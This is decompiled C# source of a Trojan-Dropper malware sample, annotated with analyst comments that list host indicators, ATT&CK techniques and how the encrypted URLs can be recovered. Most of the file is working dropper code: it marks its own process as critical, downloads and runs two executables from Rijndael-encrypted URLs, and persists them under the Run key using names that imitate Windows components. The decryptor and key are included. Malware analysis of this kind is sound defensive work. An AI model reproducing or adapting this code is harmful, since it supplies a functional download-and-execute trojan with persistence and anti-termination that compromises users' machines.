// Decompiled with JetBrains decompiler
// Type: vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ
// Assembly: Downloader, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8B96CE03-B080-4512-8CC1-7DDE95F54AAA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.bfcm-c01557638a82910361f2149b9432ad8f42d2d17a53d31917bcdb34e91acc08e6.exe
//
// ANALYST NOTES (added during review; the code below is unchanged decompiler output):
//   * This is a malware sample. The assembly path above labels it Trojan-Dropper.Win32.Dapato, and the
//     64-hex-digit suffix in the file name looks like the sample's SHA-256 (confirm against the corpus index).
//   * Type, method and parameter names are obfuscated; they carry no meaning.
//   * Host artefacts visible in this file, usable for detection and triage:
//       - <System folder>\WindowsFirewall.exe
//       - <Startup folder>\crss.exe
//       - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value "Client Runtime Service"
//       - a managed process calling ntdll!NtSetInformationProcess with information class 29
//   * The two download URLs are not in clear text. They are Base64 strings decrypted at run time with a
//     key that is fully derived from a constant in this file, so the network indicators can be recovered
//     offline, without executing the sample.

using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;

/// <summary>
/// Entry-point class of the "Downloader" assembly: it fetches two executables from encrypted URLs,
/// runs them, and registers them under the current user's Run key.
/// </summary>
internal static class vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ
{
  // Native-API import. Main passes the current process handle, information class 29, a reference to an int,
  // and a length of 4. Class 29 is ProcessBreakOnTermination in the publicly documented PROCESSINFOCLASS
  // values: a non-zero value marks the process as critical, so that terminating it crashes the system.
  // The call normally requires SeDebugPrivilege; the NTSTATUS result is never checked here.
  [DllImport("ntdll")]
  private static extern int NtSetInformationProcess(IntPtr p, int c, ref int i, int l);

  /// <summary>
  /// Runs two download-execute-persist attempts, bracketed by setting and then clearing process
  /// information class 29 on the current process.
  /// </summary>
  public static void Main()
  {
    // Set information class 29 to 1 for the duration of the download stage (self-protection / anti-termination).
    int i1 = 1;
    vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.NtSetInformationProcess(Process.GetCurrentProcess().Handle, 29, ref i1, 4);
    try
    {
      // Attempt 1: the payload is written into the System folder under a name that imitates a Windows component
      // (masquerading, MITRE ATT&CK T1036.005). Writing there presumably needs elevated rights - confirm in a sandbox.
      string fileName = Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\WindowsFirewall.exe";
      // The URL is the decrypted form of the embedded Base64 constant (ingress tool transfer, T1105).
      new WebClient().DownloadFile(vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.ÍƾYjƔơƻƄT("K4grycAwDMKvf6NsgqFQJA5PuoMdteIUZs7xA+9DovkArANHKiv+rqzid4MVJn5b"), fileName);
      // The downloaded file is executed immediately; nothing verifies its content, signature or origin.
      Process.Start(fileName);
      // Persistence through the per-user Run key (T1547.001): the value "Client Runtime Service" points at the payload.
      Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("Client Runtime Service", (object) fileName);
    }
    catch
    {
      // Every exception is swallowed, so a partial run is possible (for example a file on disk with no Run
      // value). Responders should look for each artefact independently.
    }
    try
    {
      // Attempt 2: the payload is written into the user's Startup folder, which is itself an autostart location.
      // "crss.exe" appears chosen to resemble the legitimate "csrss.exe".
      string fileName = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\crss.exe";
      // Second encrypted URL; it shares its first Base64 characters with the first one, which is consistent
      // with ECB mode and a common URL prefix.
      new WebClient().DownloadFile(vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.ÍƾYjƔơƻƄT("K4grycAwDMKvf6NsgqFQJA5PuoMdteIUZs7xA+9Dovl1hmWyr2yTB16aQjN0YI1t"), fileName);
      Process.Start(fileName);
      // Same value name as in attempt 1: if both attempts succeed, the Run value ends up pointing at crss.exe only.
      Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("Client Runtime Service", (object) fileName);
    }
    catch
    {
      // Swallowed as above.
    }
    // Reset information class 29 to 0 before Main returns.
    int i2 = 0;
    vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.NtSetInformationProcess(Process.GetCurrentProcess().Handle, 29, ref i2, 4);
  }

  /// <summary>
  /// String decryptor: Base64-decodes the argument, decrypts it with Rijndael in ECB mode under a fixed
  /// key, and returns the plaintext decoded as ASCII.
  /// </summary>
  /// <param name="ƋLƉnhCƕaƻưƗȞƙnƘռyƁzռPƉÂ">Base64-encoded ciphertext.</param>
  /// <returns>The decrypted string; in this file both call sites use it as a download URL.</returns>
  private static string ÍƾYjƔơƻƄT(string ƋLƉnhCƕaƻưƗȞƙnƘռyƁzռPƉÂ)
  {
    RijndaelManaged rijndaelManaged = new RijndaelManaged();
    MD5CryptoServiceProvider cryptoServiceProvider = new MD5CryptoServiceProvider();
    // 32-byte (256-bit) key buffer, initially all zero.
    byte[] destinationArray = new byte[32];
    // The key material is the MD5 digest (16 bytes) of the ASCII constant "u y" - a static secret embedded in the binary.
    byte[] hash = cryptoServiceProvider.ComputeHash(Encoding.ASCII.GetBytes("u y"));
    // First copy fills key[0..15] with the digest.
    Array.Copy((Array) hash, 0, (Array) destinationArray, 0, 16);
    // Second copy starts at index 15, not 16: it overwrites key[15] and fills key[15..30], leaving key[31] = 0.
    // The effective key is digest[0..14] + digest[0..15] + 0x00. Anyone re-implementing the decryptor for
    // IoC extraction must reproduce this overlap exactly.
    Array.Copy((Array) hash, 0, (Array) destinationArray, 15, 16);
    rijndaelManaged.Key = destinationArray;
    // ECB uses no IV; padding and block size are left at the RijndaelManaged defaults.
    rijndaelManaged.Mode = CipherMode.ECB;
    ICryptoTransform decryptor = rijndaelManaged.CreateDecryptor();
    byte[] inputBuffer = Convert.FromBase64String(ƋLƉnhCƕaƻưƗȞƙnƘռyƁzռPƉÂ);
    return Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));
  }
}